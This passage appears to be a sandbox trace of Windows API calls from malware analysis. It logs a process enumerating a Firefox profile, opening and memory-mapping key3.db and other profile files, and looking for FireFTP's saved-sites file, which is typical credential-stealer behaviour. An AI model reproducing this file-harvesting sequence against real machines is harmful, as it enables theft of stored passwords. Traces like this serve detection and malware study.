lstrcmpiW (lpString1="indexedDB", lpString2="..") returned 1 [0590.851] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.851] lstrlenW (lpString="\\") returned 1 [0590.852] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.852] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.852] lstrlenW (lpString="indexedDB") returned 9 [0590.852] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.852] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x63bbf0 [0590.852] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.852] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0590.852] lstrlenW (lpString="\\*.*") returned 4 [0590.852] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0590.852] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.852] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\*.*", lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 0x5b9b50 [0590.852] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.852] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 1 [0590.852] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.852] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.852] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 1 [0590.852] lstrcmpiW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0590.852] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0590.852] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0590.852] lstrlenW (lpString="\\") returned 1 [0590.852] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0590.852] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x63bd28 [0590.852] lstrlenW (lpString="moz-safe-about+home") returned 19 [0590.852] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\") returned 86 [0590.852] LocalAlloc (uFlags=0x40, uBytes=0x154) returned 0x63f8c8 [0590.852] LocalFree (hMem=0x63bd28) returned 0x0 [0590.852] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.852] lstrlenW (lpString="\\*.*") returned 4 [0590.852] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.852] LocalAlloc (uFlags=0x40, uBytes=0x15c) returned 0x63fa28 [0590.852] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\*.*", lpFindFileData=0x52d600 | out: lpFindFileData=0x52d600) returned 0x5b9b10 [0590.852] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.852] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d600 | out: lpFindFileData=0x52d600) returned 1 [0590.852] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.852] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.852] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d600 | out: lpFindFileData=0x52d600) returned 1 [0590.852] lstrlenW (lpString="\\") returned 1 [0590.852] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.852] LocalAlloc (uFlags=0x40, uBytes=0x156) returned 0x63fb90 [0590.852] lstrlenW (lpString=".metadata") returned 9 [0590.852] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\") returned 106 [0590.852] LocalAlloc (uFlags=0x40, uBytes=0x168) returned 0x63fcf0 [0590.852] LocalFree (hMem=0x63fb90) returned 0x0 [0590.852] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0590.852] CloseHandle (hObject=0x66c) returned 1 [0590.853] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x74 [0590.853] LocalAlloc (uFlags=0x40, uBytes=0x168) returned 0x63fe60 [0590.853] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata", lpDst=0x63fe60, nSize=0x74 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata") returned 0x74 [0590.853] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0590.853] CloseHandle (hObject=0x66c) returned 1 [0590.853] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0590.853] GetFileSize (in: hFile=0x66c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0590.853] CreateFileMappingW (hFile=0x66c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0590.853] CloseHandle (hObject=0x66c) returned 1 [0590.853] LocalFree (hMem=0x63fe60) returned 0x0 [0590.853] StrStrIW (lpFirst=".metadata", lpSrch="fireFTPsites.dat") returned 0x0 [0590.853] LocalFree (hMem=0x63fcf0) returned 0x0 [0590.853] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d600 | out: lpFindFileData=0x52d600) returned 1 [0590.853] lstrcmpiW (lpString1="idb", lpString2=".") returned 1 [0590.853] lstrcmpiW (lpString1="idb", lpString2="..") returned 1 [0590.853] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.853] lstrlenW (lpString="\\") returned 1 [0590.853] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0590.853] LocalAlloc (uFlags=0x40, uBytes=0x156) returned 0x63fb90 [0590.853] lstrlenW (lpString="idb") returned 3 [0590.853] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\") returned 106 [0590.853] LocalAlloc (uFlags=0x40, uBytes=0x15c) returned 0x63fcf0 [0590.853] LocalFree (hMem=0x63fb90) returned 0x0 [0590.853] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.853] lstrlenW (lpString="\\*.*") returned 4 [0590.853] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.853] LocalAlloc (uFlags=0x40, uBytes=0x164) returned 0x63fe58 [0590.853] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\*.*", lpFindFileData=0x52d388 | out: lpFindFileData=0x52d388) returned 0x5b9bd0 [0590.853] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.853] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d388 | out: lpFindFileData=0x52d388) returned 1 [0590.853] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.853] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.853] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d388 | out: lpFindFileData=0x52d388) returned 1 [0590.853] lstrcmpiW (lpString1="818200132aebmoouht", lpString2=".") returned 1 [0590.853] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="..") returned 1 [0590.853] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.853] lstrlenW (lpString="\\") returned 1 [0590.853] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.853] LocalAlloc (uFlags=0x40, uBytes=0x15e) returned 0x2ee08f0 [0590.853] lstrlenW (lpString="818200132aebmoouht") returned 18 [0590.854] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 110 [0590.854] LocalAlloc (uFlags=0x40, uBytes=0x182) returned 0x2ee0a58 [0590.854] LocalFree (hMem=0x2ee08f0) returned 0x0 [0590.854] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 128 [0590.854] lstrlenW (lpString="\\*.*") returned 4 [0590.854] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 128 [0590.854] LocalAlloc (uFlags=0x40, uBytes=0x18a) returned 0x2ee0be8 [0590.854] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*", lpFindFileData=0x52d110 | out: lpFindFileData=0x52d110) returned 0x5b9b90 [0590.854] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.854] FindNextFileW (in: hFindFile=0x5b9b90, lpFindFileData=0x52d110 | out: lpFindFileData=0x52d110) returned 1 [0590.854] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.854] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.854] FindNextFileW (in: hFindFile=0x5b9b90, lpFindFileData=0x52d110 | out: lpFindFileData=0x52d110) returned 0 [0590.854] FindClose (in: hFindFile=0x5b9b90 | out: hFindFile=0x5b9b90) returned 1 [0590.854] LocalFree (hMem=0x2ee0be8) returned 0x0 [0590.854] LocalFree (hMem=0x2ee0a58) returned 0x0 [0590.854] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d388 | out: lpFindFileData=0x52d388) returned 1 [0590.854] lstrlenW (lpString="\\") returned 1 [0590.854] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0590.854] LocalAlloc (uFlags=0x40, uBytes=0x15e) returned 0x2ee08f0 [0590.854] lstrlenW (lpString="818200132aebmoouht.sqlite") returned 25 [0590.854] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 110 [0590.854] LocalAlloc (uFlags=0x40, uBytes=0x190) returned 0x2ee0a58 [0590.854] LocalFree (hMem=0x2ee08f0) returned 0x0 [0590.854] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e0 [0590.854] CloseHandle (hObject=0x4e0) returned 1 [0590.854] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x88 [0590.854] LocalAlloc (uFlags=0x40, uBytes=0x190) returned 0x2ee0bf0 [0590.854] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", lpDst=0x2ee0bf0, nSize=0x88 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 0x88 [0590.854] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e0 [0590.854] CloseHandle (hObject=0x4e0) returned 1 [0590.854] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e0 [0590.854] GetFileSize (in: hFile=0x4e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x258000 [0590.854] CreateFileMappingW (hFile=0x4e0, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x670 [0590.854] MapViewOfFile (hFileMappingObject=0x670, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0590.873] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0590.881] CloseHandle (hObject=0x670) returned 1 [0590.881] CloseHandle (hObject=0x4e0) returned 1 [0590.881] LocalFree (hMem=0x2ee0bf0) returned 0x0 [0590.881] LocalFree (hMem=0x2ee0a58) returned 0x0 [0590.881] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d388 | out: lpFindFileData=0x52d388) returned 0 [0590.881] FindClose (in: hFindFile=0x5b9bd0 | out: hFindFile=0x5b9bd0) returned 1 [0590.881] LocalFree (hMem=0x63fe58) returned 0x0 [0590.881] LocalFree (hMem=0x63fcf0) returned 0x0 [0590.881] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d600 | out: lpFindFileData=0x52d600) returned 0 [0590.881] FindClose (in: hFindFile=0x5b9b10 | out: hFindFile=0x5b9b10) returned 1 [0590.881] LocalFree (hMem=0x63fa28) returned 0x0 [0590.881] LocalFree (hMem=0x63f8c8) returned 0x0 [0590.881] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 0 [0590.881] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.881] LocalFree (hMem=0x56cab0) returned 0x0 [0590.881] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.881] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.882] lstrlenW (lpString="\\") returned 1 [0590.882] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.882] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.882] lstrlenW (lpString="key3.db") returned 7 [0590.882] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.882] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63bbf0 [0590.882] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.882] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.882] CloseHandle (hObject=0x660) returned 1 [0590.882] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x54 [0590.882] LocalAlloc (uFlags=0x40, uBytes=0x128) returned 0x63bd28 [0590.882] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db", lpDst=0x63bd28, nSize=0x54 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db") returned 0x54 [0590.882] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.882] CloseHandle (hObject=0x660) returned 1 [0590.882] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.882] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4000 [0590.882] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.882] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.882] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.883] CloseHandle (hObject=0x668) returned 1 [0590.883] CloseHandle (hObject=0x660) returned 1 [0590.883] LocalFree (hMem=0x63bd28) returned 0x0 [0590.883] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.883] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.883] lstrlenW (lpString="\\") returned 1 [0590.883] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.883] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.883] lstrlenW (lpString="localstore.rdf") returned 14 [0590.883] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.883] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.883] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.883] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.883] CloseHandle (hObject=0x660) returned 1 [0590.883] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.883] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5dbdf0 [0590.883] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf", lpDst=0x5dbdf0, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf") returned 0x5b [0590.883] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.883] CloseHandle (hObject=0x660) returned 1 [0590.883] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.883] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4fe [0590.883] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.883] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.883] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.884] CloseHandle (hObject=0x668) returned 1 [0590.884] CloseHandle (hObject=0x660) returned 1 [0590.884] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.884] LocalFree (hMem=0x56cab0) returned 0x0 [0590.884] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.884] lstrlenW (lpString="\\") returned 1 [0590.884] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.884] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.884] lstrlenW (lpString="marionette.log") returned 14 [0590.884] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.884] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x56cab0 [0590.884] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.884] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.884] CloseHandle (hObject=0x660) returned 1 [0590.884] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5b [0590.884] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5dbdf0 [0590.884] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log", lpDst=0x5dbdf0, nSize=0x5b | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log") returned 0x5b [0590.884] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.884] CloseHandle (hObject=0x660) returned 1 [0590.884] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, 